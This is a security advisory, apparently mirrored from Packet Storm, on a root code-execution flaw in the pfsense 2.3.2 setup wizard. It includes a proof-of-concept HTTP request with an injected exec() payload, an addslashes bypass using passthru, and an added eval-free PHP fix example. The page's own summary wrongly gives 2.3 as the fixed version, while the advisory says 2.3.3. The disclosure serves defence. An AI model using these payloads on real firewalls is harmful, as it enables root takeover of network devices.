pfsense 2.3.2 Code Execution

Date: 27 Mar 2017
Reported by: Tim Coen
Type: packetstorm
Source: packetstormsecurity.com

pfsense 2.3.2 Code Execution advisory, affects setup wizard, allows for privilege escalation and undesired code execution, can be mitigated by upgrading to version 2.3.

Code

Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: pfsense 2.3.2  
Fixed in: 2.3.3  
Fixed Version Link: https://pfsense.org/download/  
Vendor Website: https://www.pfsense.org/  
Vulnerability Type: Code Execution  
Remote Exploitable: Yes  
Reported to vendor: 02/06/2017  
Disclosed to public: 03/24/2017  
Release mode: Coordinated Release  
CVE: requested via DWF  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
pfsense is an open source firewall. The web interface is written in PHP. In  
version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code  
execution.  
  
It should be noted that by default, only an administrator can access the setup  
wizard. By default, administrators have far-reaching permissions via the wizard  
and via other functionality. There are however some custom configurations where  
this vulnerability could lead to privilege escalation or undesired code  
execution.  
  
Unknown to us, this issue was previously discussed on the github page of  
opnsense (a fork of pfsense), although it was not classified as a  
vulnerability.  
  
3. Details  
  
CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
  
When updating a config field, user input is passed to eval. For most config  
types the input is sanitized. However, the sanitation can be bypassed and there  
is no sanitation for the config type interfaces_selection. Both of these issues  
can lead to code execution.  
  
An attacker needs an account with the privilege to use the wizard ("WebCfg -  
pfSense wizard subsystem page"). The attack still works even if the privilege  
"User - Config - Deny Config Write" is set, which would normally prevent the  
user from performing changes on the server or from resetting the admin  
password.  
  
To reproduce the issue, visit https://192.168.10.150/wizard.php?xml=  
openvpn_wizard.xml, follow the instructions, and at the step that the parameter  
"interface" is used, use wan";echo exec("id");" as value.  
  
Note also that the addslashes filter for types other than interfaces_selection  
can be bypassed via ${passthru($_GET[x])}.  
  
Proof of Concept:  
  
    POST /wizard.php HTTP/1.1
    Host: 192.168.10.150
    Content-Length: 506

    __csrf_magic=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next

    -> uid=0(root) gid=0(wheel) groups=0(wheel)
  
Code:  
  
/wizard.php  

    function update_config_field($field, $updatetext, $unset, $arraynum, $field_type) {
        [...]
        if($field_type == "interfaces_selection") {
            $var = "\$config{$field_conv}";
            $text = "if (isset({$var})) unset({$var});";
            $text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";";
            eval($text);
            return;
        }
        [..]
        $text = "\$config" . $field_conv . " = \"" . addslashes($updatetext) . "\";";
        eval($text);
    }
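The root cause in the code above is that a config write is performed by building PHP source text from user input and handing it to eval(), so escaping is the only thing standing between data and code (and addslashes() never touches `$`, which is why `${...}` interpolation in a double-quoted PHP string slips past it). As an added example, not pfSense's own fix, the function below shows the eval-free shape of the same operation: the field path is a plain array of keys (assumed here to stand in for the unseen $field_conv) and the value is assigned into $config by reference, so the advisory's input is stored as an inert string.

```php
<?php
// Added example (not pfSense code): eval-free replacement for the config write.
// $path is the assumed, already-parsed form of $field_conv, e.g.
// ['openvpn', 'step1', 'interface'] (constructed layout, not pfSense's real one).
function safe_update_config_field(array &$config, array $path, $updatetext, bool $unset = false): void
{
    if ($path === []) {
        throw new InvalidArgumentException('empty config path');
    }
    $ref = &$config;
    // Walk to the parent of the target key, creating intermediate arrays as needed.
    foreach (array_slice($path, 0, -1) as $key) {
        if (!isset($ref[$key]) || !is_array($ref[$key])) {
            $ref[$key] = [];
        }
        $ref = &$ref[$key];
    }
    $last = end($path);
    if ($unset) {
        // Mirrors the original's "if (isset(...)) unset(...)" without generating code.
        unset($ref[$last]);
        return;
    }
    // Plain assignment instead of string concatenation + eval():
    // the value is never parsed as PHP, so quoting and escaping are irrelevant.
    $ref[$last] = (string) $updatetext;
}

// Constructed demonstration with the value quoted in the advisory.
$config = ['openvpn' => ['step1' => ['interface' => 'lan']]];
$hostile = 'wan";echo exec("id");"';
safe_update_config_field($config, ['openvpn', 'step1', 'interface'], $hostile);
var_dump($config['openvpn']['step1']['interface'] === $hostile);

// The addslashes() bypass from the advisory: '$' is not escaped by addslashes(),
// so inside a generated double-quoted string literal it would still be interpolated.
// Stored as data it is just characters.
$interp = '${passthru($_GET[x])}';
safe_update_config_field($config, ['openvpn', 'step1', 'description'], $interp);
var_dump($config['openvpn']['step1']['description'] === $interp);

// Unset path: removes the key instead of eval'ing an unset() statement.
safe_update_config_field($config, ['openvpn', 'step1', 'description'], null, true);
var_dump(isset($config['openvpn']['step1']['description']));
```

Both var_dump() checks on stored values return true and the final isset() returns false, which is exactly the property the eval-based original lacks: the input can only ever change a config value, never the code that writes it.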
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 2.3.3:  
  
https://pfsense.org/download/  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
02/06/2017 Informed Vendor about Issue  
02/07/2017 Vendor confirms + fixes issues in git  
02/20/2017 Vendor releases fix + vendor advisory  
03/24/2017 Disclosed to public  
  
  
Blog Reference:  
https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html  
  
--  
blog: https://www.curesec.com/blog  
Atom Feed: https://www.curesec.com/blog/feed.xml  
RSS Feed: https://www.curesec.com/blog/rss.xml  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Josef-Orlopp-Straße 54  
10365 Berlin, Germany  
  
  
